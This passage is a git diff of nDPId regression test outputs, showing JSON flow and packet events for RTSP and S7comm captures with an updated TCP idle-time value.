+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567466882,"flow_last_seen":1627567466882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567466882,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1627567466882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466882,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1627567466883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1627567466883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXikAAfwaNKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567528106,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567528106,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAMAAQAGAAwp8x5yLpgIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXuEAAfwaM\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":568,"packets-processed":568,"total-skipped-flows":0,"total-l4-data-len":67396,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1627567528308} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 568/568 diff --git a/test/results/rtsp_setup_http.pcapng.out b/test/results/rtsp_setup_http.pcapng.out index 43ae951f3..62fc82d6d 100644 --- a/test/results/rtsp_setup_http.pcapng.out +++ b/test/results/rtsp_setup_http.pcapng.out @@ -1,9 +1,9 @@ 00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625568705778} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1625568705778,"pkt":"AAwpI6CIeCSvPj0DCABFAADbwOlAAEAGFzesHAWqrBwEGvlgIWqjD4UUiv5WgFAYA\/\/+rgAAU0VUVVAgcnRzcDovLzE3Mi4yOC40LjI2Ojg1NTQvdHJhY2tJRD04OCBSVFNQLzEuMA0KQ1NlcTogNA0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpUcmFuc3BvcnQ6IFJUUC9BVlA7dW5pY2FzdDtjbGllbnRfcG9ydD01MDIyMC01MDIyMQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1625568705778,"pkt":"AAwpI6CIeCSvPj0DCABFAADbwOlAAEAGFzesHAWqrBwEGvlgIWqjD4UUiv5WgFAYA\/\/+rgAAU0VUVVAgcnRzcDovLzE3Mi4yOC40LjI2Ojg1NTQvdHJhY2tJRD04OCBSVFNQLzEuMA0KQ1NlcTogNA0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpUcmFuc3BvcnQ6IFJUUC9BVlA7dW5pY2FzdDtjbGllbnRfcG9ydD01MDIyMC01MDIyMQ0KDQo="} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625568705778} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 diff --git a/test/results/s7comm.pcap.out b/test/results/s7comm.pcap.out index a2b1fd98c..e27e7d0ff 100644 --- a/test/results/s7comm.pcap.out +++ b/test/results/s7comm.pcap.out @@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"s7comm.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1408528803880} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803880,"pkt":"ABsbI+s7kOa6hF5BCABFAAA+LUtAAIAGAADAqAEKwKgBKBBZAGaQRN2iAAL7EFAY+vCDswAAAwAAFhHgAAAABwDBAgEAwgIBAsABCg=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1408528803884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803884,"pkt":"kOa6hF5BABsbI+s7CABFAAA+AM4AAB4GGGrAqAEowKgBCgBmEFkAAvsQkETduFAYEAAGowAAAwAAFhHQAAcAAwDAAQrBAgEAwgIBAg=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1408528803884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1408528803884,"pkt":"ABsbI+s7kOa6hF5BCABFAABBLUxAAIAGAADAqAEKwKgBKBBZAGaQRN24AAL7JlAY+tqDtgAAAwAAGQLwgDIBAAACAAAIAADwAAABAAEB4A=="} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1408528803880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803880,"pkt":"ABsbI+s7kOa6hF5BCABFAAA+LUtAAIAGAADAqAEKwKgBKBBZAGaQRN2iAAL7EFAY+vCDswAAAwAAFhHgAAAABwDBAgEAwgIBAsABCg=="} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} 